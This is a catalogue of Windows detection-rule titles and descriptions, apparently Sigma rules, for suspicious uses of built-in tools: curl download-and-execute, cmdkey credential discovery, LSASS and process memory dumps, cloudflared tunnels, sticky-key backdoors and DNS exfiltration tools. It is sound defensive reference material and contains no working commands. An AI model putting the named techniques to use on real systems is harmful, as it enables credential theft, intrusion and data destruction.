Deleted Data Overwritten Via Cipher.EXE Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive
Process Access via TrolleyExpress Exclusion Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory https://twitter.com/_xpn_/status/1491557187168178176, https://www.youtube.com/watch?v=Ie831jF0bb0
Data Copied To Clipboard Via Clip.EXE Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md
Cloudflared Portable Execution Detects the execution of the "cloudflared" binary from a non standard location. https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, https://github.com/cloudflare/cloudflared/releases
Cloudflared Quick Tunnel Execution Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware. https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
Cloudflared Tunnel Connections Cleanup Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections. https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps
Cloudflared Tunnel Execution Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. https://blog.reconinfosec.com/emergence-of-akira-ransomware-group, https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps
New Generic Credentials Added Via Cmdkey.EXE Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE Detects usage of cmdkey to look for cached credentials on the system https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation, https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey
Change Default File Association Via Assoc Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md
Potential Arbitrary File Download Via Cmdl32.EXE Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/, https://twitter.com/SwiftOnSecurity/status/1455897435063074824, https://github.com/LOLBAS-Project/LOLBAS/pull/151
Change Default File Association To Executable Via Assoc Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Curl Download And Execute Combination Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
File Deletion Via Del Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
Greedy File Deletion Using Del Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
File And SubFolder Enumeration Via Dir Command Detects usage of the "dir" command, part of Windows CMD, with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md
Potential Dosfuscation Activity Detects possible payload obfuscation via the commandline https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf, https://github.com/danielbohannon/Invoke-DOSfuscation
Command Line Execution with Suspicious URL and AppData Strings Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell) https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100, https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
Potential Privilege Escalation Using Symlink Between Osk and Cmd Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md, https://ss64.com/nt/mklink.html
VolumeShadowCopy Symlink Creation Via Mklink Detects the creation of a symbolic link to shadow copy storage using operating system utilities https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Suspicious File Execution From Internet Hosted WebDav Share Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files https://twitter.com/ShadowChasing1/status/1552595370961944576, https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior
Cmd.EXE Missing Space Characters Execution Anomaly Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or of a fat finger problem (typo by the developer). https://twitter.com/cyb3rops/status/1562072617552678912, https://ss64.com/nt/cmd.html
Potential CommandLine Path Traversal Via Cmd.EXE Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/, https://twitter.com/Oddvarmoe/status/1270633613449723905
NtdllPipe Like Activity Execution Detects commands that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe
Potentially Suspicious Ping/Copy Command Combination Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. Internal Research
Suspicious Ping/Del Command Combination Detects a method often used by ransomware, which combines "ping" to wait a couple of seconds and then "del" to delete the file in question. It is used, for example, to hide the file responsible for the initial infection https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf, https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
Potentially Suspicious CMD Shell Output Redirect Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Directory Removal Via Rmdir Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase
Copy From VolumeShadowCopy Via Cmd.EXE Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
Read Contents From Stdin Via Cmd.EXE Detects the use of "<" to read and potentially execute a file via cmd.exe https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md, https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe
Persistence Via Sticky Key Backdoor By replacing the sticky keys executable with the local admin's CMD executable, an attacker is able to access a privileged Windows console session without authenticating to the system. When the sticky keys are "activated" the privileged shell is launched. https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html, https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf, https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
Sticky Key Like Backdoor Execution Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
Potential Download/Upload Activity Using Type Command Detects usage of the "type" command to download/upload data from WebDAV server https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
Unusual Parent Process For Cmd.EXE Detects suspicious parent process for cmd.exe https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html
CMSTP Execution Process Creation Detects various indicators of Microsoft Connection Manager Profile Installer execution https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Arbitrary File Download Via ConfigSecurityPolicy.EXE Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files. https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/
Powershell Executed From Headless ConHost Process Detects the use of powershell commands from headless ConHost window. The "--headless" flag hides the windows from the user upon execution. https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Suspicious High IntegrityLevel Conhost Legacy Option ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29, https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control
Conhost.exe CommandLine Path Traversal Detects the usage of path traversal in conhost.exe, indicating possible command/argument confusion/hijacking https://pentestlab.blog/2020/07/06/indirect-command-execution/
Uncommon Child Process Of Conhost.EXE Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
Conhost Spawned By Uncommon Parent Process Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html
Control Panel Items Detects the malicious use of a control panel item https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins
CreateDump Process Dump Detects uses of the createdump.exe LOLBIN utility to dump process memory https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960
Dynamic .NET Compilation Via Csc.EXE Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe
Csc.EXE Execution From Potentially Suspicious Parent Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing, https://reaqta.com/2017/11/short-journey-darkvnc/, https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
Suspicious Csi.exe Usage Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. Early versions of this utility provided with the Microsoft "Roslyn" Community Technology Preview were named 'rcsi.exe' https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/, https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/, https://twitter.com/Z3Jpa29z/status/1317545798981324801
Suspicious Use of CSharp Interactive Console Detects the execution of CSharp interactive console by PowerShell https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/
Active Directory Structure Export Via Csvde.EXE Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit, https://redcanary.com/blog/msix-installers/
Potential Cookies Session Hijacking Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. https://curl.se/docs/manpage.html
Curl Web Request With Potential Custom User-Agent Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
File Download From IP URL Via Curl.EXE Detects file downloads directly from IP address URL using curl.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt
Suspicious File Download From IP Via Curl.EXE Detects potentially suspicious file downloads directly from IP addresses using curl.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt
Suspicious File Download From File Sharing Domain Via Curl.EXE Detects potentially suspicious file download from file sharing domains using curl.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
Insecure Transfer Via Curl.EXE Detects execution of "curl.exe" with the "--insecure" flag. https://curl.se/docs/manpage.html
Insecure Proxy/DOH Transfer Via Curl.EXE Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. https://curl.se/docs/manpage.html
Suspicious Curl.EXE Download Detects a suspicious curl process start on Windows and outputs the requested document to a local file https://twitter.com/max_mal_/status/1542461200797163522, https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464, https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt, https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file
Local File Read Using Curl.EXE Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. https://curl.se/docs/manpage.html
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution. https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424
Uncommon Child Process Of Defaultpack.EXE Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/, https://www.echotrail.io/insights/search/defaultpack.exe
Remote File Download Via Desktopimgdownldr Utility Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html
Suspicious Desktopimgdownldr Command Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825
Potential DLL Sideloading Via DeviceEnroller.EXE Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html
Potentially Suspicious Child Process Of ClickOnce Application Detects potentially suspicious child processes of a ClickOnce deployment application https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Arbitrary MSI Download Via Devinit.EXE Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system https://twitter.com/mrd0x/status/1460815932402679809, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/
DirLister Execution Detects the usage of "DirLister.exe", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md, https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/
PowerShell Web Access Feature Enabled Via DISM Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41
Potentially Suspicious Child Process Of DiskShadow.EXE Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
Diskshadow Script Mode - Uncommon Script Extension Execution Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension. Initial baselining of the allowed extension list is required. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
Diskshadow Script Mode - Execution From Potential Suspicious Location Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
Dism Remove Online Package Detects the removal of an online package via the Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism, https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
Dllhost.EXE Execution Anomaly Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
DLL Sideloading by VMware Xfer Utility Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/
Potential Discovery Activity Via Dnscmd.EXE Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd, https://learn.microsoft.com/en-us/azure/dns/dns-zones-records, https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
DNS Exfiltration and Tunneling Tools Execution Detects the execution of well-known DNS exfiltration tools https://github.com/iagox86/dnscat2, https://github.com/yarrick/iodine
Unusual Child Process of dns.exe Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html
Potential Application Whitelisting Bypass via Dnx.EXE Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Process Memory Dump Via Dotnet-Dump Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect, https://twitter.com/bohops/status/1635288066909966338
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE Detects execution of arbitrary DLLs or unsigned code via ".csproj" files using Dotnet.EXE. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/, https://twitter.com/_felamos/status/1204705548668555264, https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
Binary Proxy Execution Via Dotnet-Trace.EXE Detects commandline arguments for executing a child process via dotnet-trace.exe https://twitter.com/bohops/status/1740022869198037480
Potential Recon Activity Using DriverQuery.EXE Detects usage of the "driverquery" utility to perform reconnaissance on installed drivers https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
DriverQuery.EXE Execution Detects usage of the "driverquery" utility, which can be used to perform reconnaissance on installed drivers https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
Potentially Over Permissive Permissions Granted Using Dsacls.EXE Detects usage of Dsacls to grant over permissive permissions https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
Potential Password Spraying Attempt Using Dsacls.EXE Detects possible password spraying attempts using Dsacls https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone, https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
Domain Trust Discovery Via Dsquery Detects execution of "dsquery.exe" for domain trust discovery https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md, https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843
Suspicious Kernel Dump Using Dtrace Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 https://twitter.com/0gtweet/status/1474899714290208777?s=12, https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace
Potential Windows Defender AV Bypass Via Dump64.EXE Rename Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. https://twitter.com/mrd0x/status/1460597833917251595
DumpMinitool Execution Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/, https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f
Suspicious DumpMinitool Execution Detects suspicious ways to use the "DumpMinitool.exe" binary https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/
New Capture Session Launched Via DXCap.EXE Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/, https://twitter.com/harr0ey/status/992008180904419328
Esentutl Gather Credentials Detects the use of esentutl to access a dumped NTDS file, as recommended by Conti to its affiliates. Trickbot also uses this utility to get MSEdge info via its module pwgrab. https://twitter.com/vxunderground/status/1423336151860002816, https://attack.mitre.org/software/S0404/, https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
